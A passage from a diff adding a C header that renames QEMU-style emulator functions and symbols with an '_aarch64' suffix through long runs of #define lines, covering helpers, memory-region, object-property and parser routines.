helper_pre_smc_aarch64 +#define helper_qadd16 helper_qadd16_aarch64 +#define helper_qadd8 helper_qadd8_aarch64 +#define helper_qaddsubx helper_qaddsubx_aarch64 +#define helper_qsub16 helper_qsub16_aarch64 +#define helper_qsub8 helper_qsub8_aarch64 +#define helper_qsubaddx helper_qsubaddx_aarch64 +#define helper_rbit helper_rbit_aarch64 +#define helper_recpe_f32 helper_recpe_f32_aarch64 +#define helper_recpe_f64 helper_recpe_f64_aarch64 +#define helper_recpe_u32 helper_recpe_u32_aarch64 +#define helper_recps_f32 helper_recps_f32_aarch64 +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_aarch64 +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_aarch64 +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_aarch64 +#define helper_ret_stb_mmu helper_ret_stb_mmu_aarch64 +#define helper_rintd helper_rintd_aarch64 +#define helper_rintd_exact helper_rintd_exact_aarch64 +#define helper_rints helper_rints_aarch64 +#define helper_rints_exact helper_rints_exact_aarch64 +#define helper_ror_cc helper_ror_cc_aarch64 +#define 
helper_rsqrte_f32 helper_rsqrte_f32_aarch64 +#define helper_rsqrte_f64 helper_rsqrte_f64_aarch64 +#define helper_rsqrte_u32 helper_rsqrte_u32_aarch64 +#define helper_rsqrts_f32 helper_rsqrts_f32_aarch64 +#define helper_sadd16 helper_sadd16_aarch64 +#define helper_sadd8 helper_sadd8_aarch64 +#define helper_saddsubx helper_saddsubx_aarch64 +#define helper_sar_cc helper_sar_cc_aarch64 +#define helper_sdiv helper_sdiv_aarch64 +#define helper_sel_flags helper_sel_flags_aarch64 +#define helper_set_cp_reg helper_set_cp_reg_aarch64 +#define helper_set_cp_reg64 helper_set_cp_reg64_aarch64 +#define helper_set_neon_rmode helper_set_neon_rmode_aarch64 +#define helper_set_r13_banked helper_set_r13_banked_aarch64 +#define helper_set_rmode helper_set_rmode_aarch64 +#define helper_set_user_reg helper_set_user_reg_aarch64 +#define helper_shadd16 helper_shadd16_aarch64 +#define helper_shadd8 helper_shadd8_aarch64 +#define helper_shaddsubx helper_shaddsubx_aarch64 +#define helper_shl_cc helper_shl_cc_aarch64 +#define helper_shr_cc helper_shr_cc_aarch64 +#define helper_shsub16 helper_shsub16_aarch64 +#define helper_shsub8 helper_shsub8_aarch64 +#define helper_shsubaddx helper_shsubaddx_aarch64 +#define helper_ssat helper_ssat_aarch64 +#define helper_ssat16 helper_ssat16_aarch64 +#define helper_ssub16 helper_ssub16_aarch64 +#define helper_ssub8 helper_ssub8_aarch64 +#define helper_ssubaddx helper_ssubaddx_aarch64 +#define helper_stb_mmu helper_stb_mmu_aarch64 +#define helper_stl_mmu helper_stl_mmu_aarch64 +#define helper_stq_mmu helper_stq_mmu_aarch64 +#define helper_stw_mmu helper_stw_mmu_aarch64 +#define helper_sub_saturate helper_sub_saturate_aarch64 +#define helper_sub_usaturate helper_sub_usaturate_aarch64 +#define helper_sxtb16 helper_sxtb16_aarch64 +#define helper_uadd16 helper_uadd16_aarch64 +#define helper_uadd8 helper_uadd8_aarch64 +#define helper_uaddsubx helper_uaddsubx_aarch64 +#define helper_udiv helper_udiv_aarch64 +#define helper_uhadd16 helper_uhadd16_aarch64 +#define 
helper_uhadd8 helper_uhadd8_aarch64 +#define helper_uhaddsubx helper_uhaddsubx_aarch64 +#define helper_uhsub16 helper_uhsub16_aarch64 +#define helper_uhsub8 helper_uhsub8_aarch64 +#define helper_uhsubaddx helper_uhsubaddx_aarch64 +#define helper_uqadd16 helper_uqadd16_aarch64 +#define helper_uqadd8 helper_uqadd8_aarch64 +#define helper_uqaddsubx helper_uqaddsubx_aarch64 +#define helper_uqsub16 helper_uqsub16_aarch64 +#define helper_uqsub8 helper_uqsub8_aarch64 +#define helper_uqsubaddx helper_uqsubaddx_aarch64 +#define helper_usad8 helper_usad8_aarch64 +#define helper_usat helper_usat_aarch64 +#define helper_usat16 helper_usat16_aarch64 +#define helper_usub16 helper_usub16_aarch64 +#define helper_usub8 helper_usub8_aarch64 +#define helper_usubaddx helper_usubaddx_aarch64 +#define helper_uxtb16 helper_uxtb16_aarch64 +#define helper_v7m_mrs helper_v7m_mrs_aarch64 +#define helper_v7m_msr helper_v7m_msr_aarch64 +#define helper_vfp_absd helper_vfp_absd_aarch64 +#define helper_vfp_abss helper_vfp_abss_aarch64 +#define helper_vfp_addd helper_vfp_addd_aarch64 +#define helper_vfp_adds helper_vfp_adds_aarch64 +#define helper_vfp_cmpd helper_vfp_cmpd_aarch64 +#define helper_vfp_cmped helper_vfp_cmped_aarch64 +#define helper_vfp_cmpes helper_vfp_cmpes_aarch64 +#define helper_vfp_cmps helper_vfp_cmps_aarch64 +#define helper_vfp_divd helper_vfp_divd_aarch64 +#define helper_vfp_divs helper_vfp_divs_aarch64 +#define helper_vfp_fcvtds helper_vfp_fcvtds_aarch64 +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_aarch64 +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_aarch64 +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_aarch64 +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_aarch64 +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_aarch64 +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_aarch64 +#define helper_vfp_maxd helper_vfp_maxd_aarch64 +#define helper_vfp_maxnumd helper_vfp_maxnumd_aarch64 +#define helper_vfp_maxnums 
helper_vfp_maxnums_aarch64 +#define helper_vfp_maxs helper_vfp_maxs_aarch64 +#define helper_vfp_mind helper_vfp_mind_aarch64 +#define helper_vfp_minnumd helper_vfp_minnumd_aarch64 +#define helper_vfp_minnums helper_vfp_minnums_aarch64 +#define helper_vfp_mins helper_vfp_mins_aarch64 +#define helper_vfp_muladdd helper_vfp_muladdd_aarch64 +#define helper_vfp_muladds helper_vfp_muladds_aarch64 +#define helper_vfp_muld helper_vfp_muld_aarch64 +#define helper_vfp_muls helper_vfp_muls_aarch64 +#define helper_vfp_negd helper_vfp_negd_aarch64 +#define helper_vfp_negs helper_vfp_negs_aarch64 +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_aarch64 +#define helper_vfp_shtod helper_vfp_shtod_aarch64 +#define helper_vfp_shtos helper_vfp_shtos_aarch64 +#define helper_vfp_sitod helper_vfp_sitod_aarch64 +#define helper_vfp_sitos helper_vfp_sitos_aarch64 +#define helper_vfp_sltod helper_vfp_sltod_aarch64 +#define helper_vfp_sltos helper_vfp_sltos_aarch64 +#define helper_vfp_sqrtd helper_vfp_sqrtd_aarch64 +#define helper_vfp_sqrts helper_vfp_sqrts_aarch64 +#define helper_vfp_sqtod helper_vfp_sqtod_aarch64 +#define helper_vfp_sqtos helper_vfp_sqtos_aarch64 +#define helper_vfp_subd helper_vfp_subd_aarch64 +#define helper_vfp_subs helper_vfp_subs_aarch64 +#define helper_vfp_toshd helper_vfp_toshd_aarch64 +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_aarch64 +#define helper_vfp_toshs helper_vfp_toshs_aarch64 +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_aarch64 +#define helper_vfp_tosid helper_vfp_tosid_aarch64 +#define helper_vfp_tosis helper_vfp_tosis_aarch64 +#define helper_vfp_tosizd helper_vfp_tosizd_aarch64 +#define helper_vfp_tosizs helper_vfp_tosizs_aarch64 +#define helper_vfp_tosld helper_vfp_tosld_aarch64 +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_aarch64 +#define helper_vfp_tosls helper_vfp_tosls_aarch64 +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_aarch64 +#define 
helper_vfp_tosqd helper_vfp_tosqd_aarch64 +#define helper_vfp_tosqs helper_vfp_tosqs_aarch64 +#define helper_vfp_touhd helper_vfp_touhd_aarch64 +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_aarch64 +#define helper_vfp_touhs helper_vfp_touhs_aarch64 +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_aarch64 +#define helper_vfp_touid helper_vfp_touid_aarch64 +#define helper_vfp_touis helper_vfp_touis_aarch64 +#define helper_vfp_touizd helper_vfp_touizd_aarch64 +#define helper_vfp_touizs helper_vfp_touizs_aarch64 +#define helper_vfp_tould helper_vfp_tould_aarch64 +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_aarch64 +#define helper_vfp_touls helper_vfp_touls_aarch64 +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_aarch64 +#define helper_vfp_touqd helper_vfp_touqd_aarch64 +#define helper_vfp_touqs helper_vfp_touqs_aarch64 +#define helper_vfp_uhtod helper_vfp_uhtod_aarch64 +#define helper_vfp_uhtos helper_vfp_uhtos_aarch64 +#define helper_vfp_uitod helper_vfp_uitod_aarch64 +#define helper_vfp_uitos helper_vfp_uitos_aarch64 +#define helper_vfp_ultod helper_vfp_ultod_aarch64 +#define helper_vfp_ultos helper_vfp_ultos_aarch64 +#define helper_vfp_uqtod helper_vfp_uqtod_aarch64 +#define helper_vfp_uqtos helper_vfp_uqtos_aarch64 +#define helper_wfe helper_wfe_aarch64 +#define helper_wfi helper_wfi_aarch64 +#define hex2decimal hex2decimal_aarch64 +#define hw_breakpoint_update hw_breakpoint_update_aarch64 +#define hw_breakpoint_update_all hw_breakpoint_update_all_aarch64 +#define hw_watchpoint_update hw_watchpoint_update_aarch64 +#define hw_watchpoint_update_all hw_watchpoint_update_all_aarch64 +#define _init _init_aarch64 +#define init_cpreg_list init_cpreg_list_aarch64 +#define init_lists init_lists_aarch64 +#define input_type_enum input_type_enum_aarch64 +#define int128_2_64 int128_2_64_aarch64 +#define int128_add int128_add_aarch64 +#define int128_addto int128_addto_aarch64 +#define 
int128_and int128_and_aarch64 +#define int128_eq int128_eq_aarch64 +#define int128_ge int128_ge_aarch64 +#define int128_get64 int128_get64_aarch64 +#define int128_gt int128_gt_aarch64 +#define int128_le int128_le_aarch64 +#define int128_lt int128_lt_aarch64 +#define int128_make64 int128_make64_aarch64 +#define int128_max int128_max_aarch64 +#define int128_min int128_min_aarch64 +#define int128_ne int128_ne_aarch64 +#define int128_neg int128_neg_aarch64 +#define int128_nz int128_nz_aarch64 +#define int128_rshift int128_rshift_aarch64 +#define int128_sub int128_sub_aarch64 +#define int128_subfrom int128_subfrom_aarch64 +#define int128_zero int128_zero_aarch64 +#define int16_to_float32 int16_to_float32_aarch64 +#define int16_to_float64 int16_to_float64_aarch64 +#define int32_to_float128 int32_to_float128_aarch64 +#define int32_to_float32 int32_to_float32_aarch64 +#define int32_to_float64 int32_to_float64_aarch64 +#define int32_to_floatx80 int32_to_floatx80_aarch64 +#define int64_to_float128 int64_to_float128_aarch64 +#define int64_to_float32 int64_to_float32_aarch64 +#define int64_to_float64 int64_to_float64_aarch64 +#define int64_to_floatx80 int64_to_floatx80_aarch64 +#define invalidate_and_set_dirty invalidate_and_set_dirty_aarch64 +#define invalidate_page_bitmap invalidate_page_bitmap_aarch64 +#define io_mem_read io_mem_read_aarch64 +#define io_mem_write io_mem_write_aarch64 +#define io_readb io_readb_aarch64 +#define io_readl io_readl_aarch64 +#define io_readq io_readq_aarch64 +#define io_readw io_readw_aarch64 +#define iotlb_to_region iotlb_to_region_aarch64 +#define io_writeb io_writeb_aarch64 +#define io_writel io_writel_aarch64 +#define io_writeq io_writeq_aarch64 +#define io_writew io_writew_aarch64 +#define is_a64 is_a64_aarch64 +#define is_help_option is_help_option_aarch64 +#define isr_read isr_read_aarch64 +#define is_valid_option_list is_valid_option_list_aarch64 +#define iwmmxt_load_creg iwmmxt_load_creg_aarch64 +#define iwmmxt_load_reg 
iwmmxt_load_reg_aarch64 +#define iwmmxt_store_creg iwmmxt_store_creg_aarch64 +#define iwmmxt_store_reg iwmmxt_store_reg_aarch64 +#define __jit_debug_descriptor __jit_debug_descriptor_aarch64 +#define __jit_debug_register_code __jit_debug_register_code_aarch64 +#define kvm_to_cpreg_id kvm_to_cpreg_id_aarch64 +#define last_ram_offset last_ram_offset_aarch64 +#define ldl_be_p ldl_be_p_aarch64 +#define ldl_be_phys ldl_be_phys_aarch64 +#define ldl_he_p ldl_he_p_aarch64 +#define ldl_le_p ldl_le_p_aarch64 +#define ldl_le_phys ldl_le_phys_aarch64 +#define ldl_phys ldl_phys_aarch64 +#define ldl_phys_internal ldl_phys_internal_aarch64 +#define ldq_be_p ldq_be_p_aarch64 +#define ldq_be_phys ldq_be_phys_aarch64 +#define ldq_he_p ldq_he_p_aarch64 +#define ldq_le_p ldq_le_p_aarch64 +#define ldq_le_phys ldq_le_phys_aarch64 +#define ldq_phys ldq_phys_aarch64 +#define ldq_phys_internal ldq_phys_internal_aarch64 +#define ldst_name ldst_name_aarch64 +#define ldub_p ldub_p_aarch64 +#define ldub_phys ldub_phys_aarch64 +#define lduw_be_p lduw_be_p_aarch64 +#define lduw_be_phys lduw_be_phys_aarch64 +#define lduw_he_p lduw_he_p_aarch64 +#define lduw_le_p lduw_le_p_aarch64 +#define lduw_le_phys lduw_le_phys_aarch64 +#define lduw_phys lduw_phys_aarch64 +#define lduw_phys_internal lduw_phys_internal_aarch64 +#define le128 le128_aarch64 +#define linked_bp_matches linked_bp_matches_aarch64 +#define listener_add_address_space listener_add_address_space_aarch64 +#define load_cpu_offset load_cpu_offset_aarch64 +#define load_reg load_reg_aarch64 +#define load_reg_var load_reg_var_aarch64 +#define log_cpu_state log_cpu_state_aarch64 +#define lpae_cp_reginfo lpae_cp_reginfo_aarch64 +#define lt128 lt128_aarch64 +#define machine_class_init machine_class_init_aarch64 +#define machine_finalize machine_finalize_aarch64 +#define machine_info machine_info_aarch64 +#define machine_initfn machine_initfn_aarch64 +#define machine_register_types machine_register_types_aarch64 +#define machvirt_init 
machvirt_init_aarch64 +#define machvirt_machine_init machvirt_machine_init_aarch64 +#define maj maj_aarch64 +#define mapping_conflict mapping_conflict_aarch64 +#define mapping_contiguous mapping_contiguous_aarch64 +#define mapping_have_same_region mapping_have_same_region_aarch64 +#define mapping_merge mapping_merge_aarch64 +#define mem_add mem_add_aarch64 +#define mem_begin mem_begin_aarch64 +#define mem_commit mem_commit_aarch64 +#define memory_access_is_direct memory_access_is_direct_aarch64 +#define memory_access_size memory_access_size_aarch64 +#define memory_init memory_init_aarch64 +#define memory_listener_match memory_listener_match_aarch64 +#define memory_listener_register memory_listener_register_aarch64 +#define memory_listener_unregister memory_listener_unregister_aarch64 +#define memory_map_init memory_map_init_aarch64 +#define memory_mapping_filter memory_mapping_filter_aarch64 +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_aarch64 +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_aarch64 +#define memory_mapping_list_free memory_mapping_list_free_aarch64 +#define memory_mapping_list_init memory_mapping_list_init_aarch64 +#define memory_region_access_valid memory_region_access_valid_aarch64 +#define memory_region_add_subregion memory_region_add_subregion_aarch64 +#define memory_region_add_subregion_common memory_region_add_subregion_common_aarch64 +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_aarch64 +#define memory_region_big_endian memory_region_big_endian_aarch64 +#define memory_region_clear_pending memory_region_clear_pending_aarch64 +#define memory_region_del_subregion memory_region_del_subregion_aarch64 +#define memory_region_destructor_alias memory_region_destructor_alias_aarch64 +#define memory_region_destructor_none memory_region_destructor_none_aarch64 +#define memory_region_destructor_ram memory_region_destructor_ram_aarch64 +#define 
memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_aarch64 +#define memory_region_dispatch_read memory_region_dispatch_read_aarch64 +#define memory_region_dispatch_read1 memory_region_dispatch_read1_aarch64 +#define memory_region_dispatch_write memory_region_dispatch_write_aarch64 +#define memory_region_escape_name memory_region_escape_name_aarch64 +#define memory_region_finalize memory_region_finalize_aarch64 +#define memory_region_find memory_region_find_aarch64 +#define memory_region_get_addr memory_region_get_addr_aarch64 +#define memory_region_get_alignment memory_region_get_alignment_aarch64 +#define memory_region_get_container memory_region_get_container_aarch64 +#define memory_region_get_fd memory_region_get_fd_aarch64 +#define memory_region_get_may_overlap memory_region_get_may_overlap_aarch64 +#define memory_region_get_priority memory_region_get_priority_aarch64 +#define memory_region_get_ram_addr memory_region_get_ram_addr_aarch64 +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_aarch64 +#define memory_region_get_size memory_region_get_size_aarch64 +#define memory_region_info memory_region_info_aarch64 +#define memory_region_init memory_region_init_aarch64 +#define memory_region_init_alias memory_region_init_alias_aarch64 +#define memory_region_initfn memory_region_initfn_aarch64 +#define memory_region_init_io memory_region_init_io_aarch64 +#define memory_region_init_ram memory_region_init_ram_aarch64 +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_aarch64 +#define memory_region_init_reservation memory_region_init_reservation_aarch64 +#define memory_region_is_iommu memory_region_is_iommu_aarch64 +#define memory_region_is_logging memory_region_is_logging_aarch64 +#define memory_region_is_mapped memory_region_is_mapped_aarch64 +#define memory_region_is_ram memory_region_is_ram_aarch64 +#define memory_region_is_rom memory_region_is_rom_aarch64 +#define memory_region_is_romd memory_region_is_romd_aarch64 
+#define memory_region_is_skip_dump memory_region_is_skip_dump_aarch64 +#define memory_region_is_unassigned memory_region_is_unassigned_aarch64 +#define memory_region_name memory_region_name_aarch64 +#define memory_region_need_escape memory_region_need_escape_aarch64 +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_aarch64 +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_aarch64 +#define memory_region_present memory_region_present_aarch64 +#define memory_region_read_accessor memory_region_read_accessor_aarch64 +#define memory_region_readd_subregion memory_region_readd_subregion_aarch64 +#define memory_region_ref memory_region_ref_aarch64 +#define memory_region_resolve_container memory_region_resolve_container_aarch64 +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_aarch64 +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_aarch64 +#define memory_region_set_address memory_region_set_address_aarch64 +#define memory_region_set_alias_offset memory_region_set_alias_offset_aarch64 +#define memory_region_set_enabled memory_region_set_enabled_aarch64 +#define memory_region_set_readonly memory_region_set_readonly_aarch64 +#define memory_region_set_skip_dump memory_region_set_skip_dump_aarch64 +#define memory_region_size memory_region_size_aarch64 +#define memory_region_to_address_space memory_region_to_address_space_aarch64 +#define memory_region_transaction_begin memory_region_transaction_begin_aarch64 +#define memory_region_transaction_commit memory_region_transaction_commit_aarch64 +#define memory_region_unref memory_region_unref_aarch64 +#define memory_region_update_container_subregions memory_region_update_container_subregions_aarch64 +#define memory_region_write_accessor memory_region_write_accessor_aarch64 +#define memory_region_wrong_endianness memory_region_wrong_endianness_aarch64 +#define memory_try_enable_merging memory_try_enable_merging_aarch64 
+#define module_call_init module_call_init_aarch64 +#define module_load module_load_aarch64 +#define mpidr_cp_reginfo mpidr_cp_reginfo_aarch64 +#define mpidr_read mpidr_read_aarch64 +#define msr_mask msr_mask_aarch64 +#define mul128By64To192 mul128By64To192_aarch64 +#define mul128To256 mul128To256_aarch64 +#define mul64To128 mul64To128_aarch64 +#define muldiv64 muldiv64_aarch64 +#define neon_2rm_is_float_op neon_2rm_is_float_op_aarch64 +#define neon_2rm_sizes neon_2rm_sizes_aarch64 +#define neon_3r_sizes neon_3r_sizes_aarch64 +#define neon_get_scalar neon_get_scalar_aarch64 +#define neon_load_reg neon_load_reg_aarch64 +#define neon_load_reg64 neon_load_reg64_aarch64 +#define neon_load_scratch neon_load_scratch_aarch64 +#define neon_ls_element_type neon_ls_element_type_aarch64 +#define neon_reg_offset neon_reg_offset_aarch64 +#define neon_store_reg neon_store_reg_aarch64 +#define neon_store_reg64 neon_store_reg64_aarch64 +#define neon_store_scratch neon_store_scratch_aarch64 +#define new_ldst_label new_ldst_label_aarch64 +#define next_list next_list_aarch64 +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_aarch64 +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_aarch64 +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_aarch64 +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_aarch64 +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_aarch64 +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_aarch64 +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_aarch64 +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_aarch64 +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_aarch64 +#define not_v6_cp_reginfo not_v6_cp_reginfo_aarch64 +#define not_v7_cp_reginfo not_v7_cp_reginfo_aarch64 +#define not_v8_cp_reginfo not_v8_cp_reginfo_aarch64 +#define object_child_foreach object_child_foreach_aarch64 +#define object_class_foreach 
object_class_foreach_aarch64 +#define object_class_foreach_tramp object_class_foreach_tramp_aarch64 +#define object_class_get_list object_class_get_list_aarch64 +#define object_class_get_list_tramp object_class_get_list_tramp_aarch64 +#define object_class_get_parent object_class_get_parent_aarch64 +#define object_deinit object_deinit_aarch64 +#define object_dynamic_cast object_dynamic_cast_aarch64 +#define object_finalize object_finalize_aarch64 +#define object_finalize_child_property object_finalize_child_property_aarch64 +#define object_get_child_property object_get_child_property_aarch64 +#define object_get_link_property object_get_link_property_aarch64 +#define object_get_root object_get_root_aarch64 +#define object_initialize_with_type object_initialize_with_type_aarch64 +#define object_init_with_type object_init_with_type_aarch64 +#define object_instance_init object_instance_init_aarch64 +#define object_new_with_type object_new_with_type_aarch64 +#define object_post_init_with_type object_post_init_with_type_aarch64 +#define object_property_add_alias object_property_add_alias_aarch64 +#define object_property_add_link object_property_add_link_aarch64 +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_aarch64 +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_aarch64 +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_aarch64 +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_aarch64 +#define object_property_allow_set_link object_property_allow_set_link_aarch64 +#define object_property_del object_property_del_aarch64 +#define object_property_del_all object_property_del_all_aarch64 +#define object_property_find object_property_find_aarch64 +#define object_property_get object_property_get_aarch64 +#define object_property_get_bool object_property_get_bool_aarch64 +#define object_property_get_int object_property_get_int_aarch64 +#define object_property_get_link 
object_property_get_link_aarch64 +#define object_property_get_qobject object_property_get_qobject_aarch64 +#define object_property_get_str object_property_get_str_aarch64 +#define object_property_get_type object_property_get_type_aarch64 +#define object_property_is_child object_property_is_child_aarch64 +#define object_property_set object_property_set_aarch64 +#define object_property_set_description object_property_set_description_aarch64 +#define object_property_set_link object_property_set_link_aarch64 +#define object_property_set_qobject object_property_set_qobject_aarch64 +#define object_release_link_property object_release_link_property_aarch64 +#define object_resolve_abs_path object_resolve_abs_path_aarch64 +#define object_resolve_child_property object_resolve_child_property_aarch64 +#define object_resolve_link object_resolve_link_aarch64 +#define object_resolve_link_property object_resolve_link_property_aarch64 +#define object_resolve_partial_path object_resolve_partial_path_aarch64 +#define object_resolve_path object_resolve_path_aarch64 +#define object_resolve_path_component object_resolve_path_component_aarch64 +#define object_resolve_path_type object_resolve_path_type_aarch64 +#define object_set_link_property object_set_link_property_aarch64 +#define object_unparent object_unparent_aarch64 +#define omap_cachemaint_write omap_cachemaint_write_aarch64 +#define omap_cp_reginfo omap_cp_reginfo_aarch64 +#define omap_threadid_write omap_threadid_write_aarch64 +#define omap_ticonfig_write omap_ticonfig_write_aarch64 +#define omap_wfi_write omap_wfi_write_aarch64 +#define op_bits op_bits_aarch64 +#define open_modeflags open_modeflags_aarch64 +#define op_to_mov op_to_mov_aarch64 +#define op_to_movi op_to_movi_aarch64 +#define output_type_enum output_type_enum_aarch64 +#define packFloat128 packFloat128_aarch64 +#define packFloat16 packFloat16_aarch64 +#define packFloat32 packFloat32_aarch64 +#define packFloat64 packFloat64_aarch64 +#define packFloatx80 
packFloatx80_aarch64 +#define page_find page_find_aarch64 +#define page_find_alloc page_find_alloc_aarch64 +#define page_flush_tb page_flush_tb_aarch64 +#define page_flush_tb_1 page_flush_tb_1_aarch64 +#define page_init page_init_aarch64 +#define page_size_init page_size_init_aarch64 +#define par par_aarch64 +#define parse_array parse_array_aarch64 +#define parse_error parse_error_aarch64 +#define parse_escape parse_escape_aarch64 +#define parse_keyword parse_keyword_aarch64 +#define parse_literal parse_literal_aarch64 +#define parse_object parse_object_aarch64 +#define parse_optional parse_optional_aarch64 +#define parse_option_bool parse_option_bool_aarch64 +#define parse_option_number parse_option_number_aarch64 +#define parse_option_size parse_option_size_aarch64 +#define parse_pair parse_pair_aarch64 +#define parser_context_free parser_context_free_aarch64 +#define parser_context_new parser_context_new_aarch64 +#define parser_context_peek_token parser_context_peek_token_aarch64 +#define parser_context_pop_token parser_context_pop_token_aarch64 +#define parser_context_restore parser_context_restore_aarch64 +#define parser_context_save parser_context_save_aarch64 +#define parse_str parse_str_aarch64 +#define parse_type_bool parse_type_bool_aarch64 +#define parse_type_int parse_type_int_aarch64 +#define parse_type_number parse_type_number_aarch64 +#define parse_type_size parse_type_size_aarch64 +#define parse_type_str parse_type_str_aarch64 +#define parse_value parse_value_aarch64 +#define par_write par_write_aarch64 +#define patch_reloc patch_reloc_aarch64 +#define phys_map_node_alloc phys_map_node_alloc_aarch64 +#define phys_map_node_reserve phys_map_node_reserve_aarch64 +#define phys_mem_alloc phys_mem_alloc_aarch64 +#define phys_mem_set_alloc phys_mem_set_alloc_aarch64 +#define phys_page_compact phys_page_compact_aarch64 +#define phys_page_compact_all phys_page_compact_all_aarch64 +#define phys_page_find phys_page_find_aarch64 +#define phys_page_set 
phys_page_set_aarch64 +#define phys_page_set_level phys_page_set_level_aarch64 +#define phys_section_add phys_section_add_aarch64 +#define phys_section_destroy phys_section_destroy_aarch64 +#define phys_sections_free phys_sections_free_aarch64 +#define pickNaN pickNaN_aarch64 +#define pickNaNMulAdd pickNaNMulAdd_aarch64 +#define pmccfiltr_write pmccfiltr_write_aarch64 +#define pmccntr_read pmccntr_read_aarch64 +#define pmccntr_sync pmccntr_sync_aarch64 +#define pmccntr_write pmccntr_write_aarch64 +#define pmccntr_write32 pmccntr_write32_aarch64 +#define pmcntenclr_write pmcntenclr_write_aarch64 +#define pmcntenset_write pmcntenset_write_aarch64 +#define pmcr_write pmcr_write_aarch64 +#define pmintenclr_write pmintenclr_write_aarch64 +#define pmintenset_write pmintenset_write_aarch64 +#define pmovsr_write pmovsr_write_aarch64 +#define pmreg_access pmreg_access_aarch64 +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_aarch64 +#define pmsav5_data_ap_read pmsav5_data_ap_read_aarch64 +#define pmsav5_data_ap_write pmsav5_data_ap_write_aarch64 +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_aarch64 +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_aarch64 +#define pmuserenr_write pmuserenr_write_aarch64 +#define pmxevtyper_write pmxevtyper_write_aarch64 +#define print_type_bool print_type_bool_aarch64 +#define print_type_int print_type_int_aarch64 +#define print_type_number print_type_number_aarch64 +#define print_type_size print_type_size_aarch64 +#define print_type_str print_type_str_aarch64 +#define propagateFloat128NaN propagateFloat128NaN_aarch64 +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_aarch64 +#define propagateFloat32NaN propagateFloat32NaN_aarch64 +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_aarch64 +#define propagateFloat64NaN propagateFloat64NaN_aarch64 +#define propagateFloatx80NaN propagateFloatx80NaN_aarch64 +#define property_get_alias property_get_alias_aarch64 +#define property_get_bool property_get_bool_aarch64 +#define 
property_get_str property_get_str_aarch64 +#define property_get_uint16_ptr property_get_uint16_ptr_aarch64 +#define property_get_uint32_ptr property_get_uint32_ptr_aarch64 +#define property_get_uint64_ptr property_get_uint64_ptr_aarch64 +#define property_get_uint8_ptr property_get_uint8_ptr_aarch64 +#define property_release_alias property_release_alias_aarch64 +#define property_release_bool property_release_bool_aarch64 +#define property_release_str property_release_str_aarch64 +#define property_resolve_alias property_resolve_alias_aarch64 +#define property_set_alias property_set_alias_aarch64 +#define property_set_bool property_set_bool_aarch64 +#define property_set_str property_set_str_aarch64 +#define pstate_read pstate_read_aarch64 +#define pstate_write pstate_write_aarch64 +#define pxa250_initfn pxa250_initfn_aarch64 +#define pxa255_initfn pxa255_initfn_aarch64 +#define pxa260_initfn pxa260_initfn_aarch64 +#define pxa261_initfn pxa261_initfn_aarch64 +#define pxa262_initfn pxa262_initfn_aarch64 +#define pxa270a0_initfn pxa270a0_initfn_aarch64 +#define pxa270a1_initfn pxa270a1_initfn_aarch64 +#define pxa270b0_initfn pxa270b0_initfn_aarch64 +#define pxa270b1_initfn pxa270b1_initfn_aarch64 +#define pxa270c0_initfn pxa270c0_initfn_aarch64 +#define pxa270c5_initfn pxa270c5_initfn_aarch64 +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_aarch64 +#define qapi_dealloc_end_list qapi_dealloc_end_list_aarch64 +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_aarch64 +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_aarch64 +#define qapi_dealloc_next_list qapi_dealloc_next_list_aarch64 +#define qapi_dealloc_pop qapi_dealloc_pop_aarch64 +#define qapi_dealloc_push qapi_dealloc_push_aarch64 +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_aarch64 +#define qapi_dealloc_start_list qapi_dealloc_start_list_aarch64 +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_aarch64 +#define 
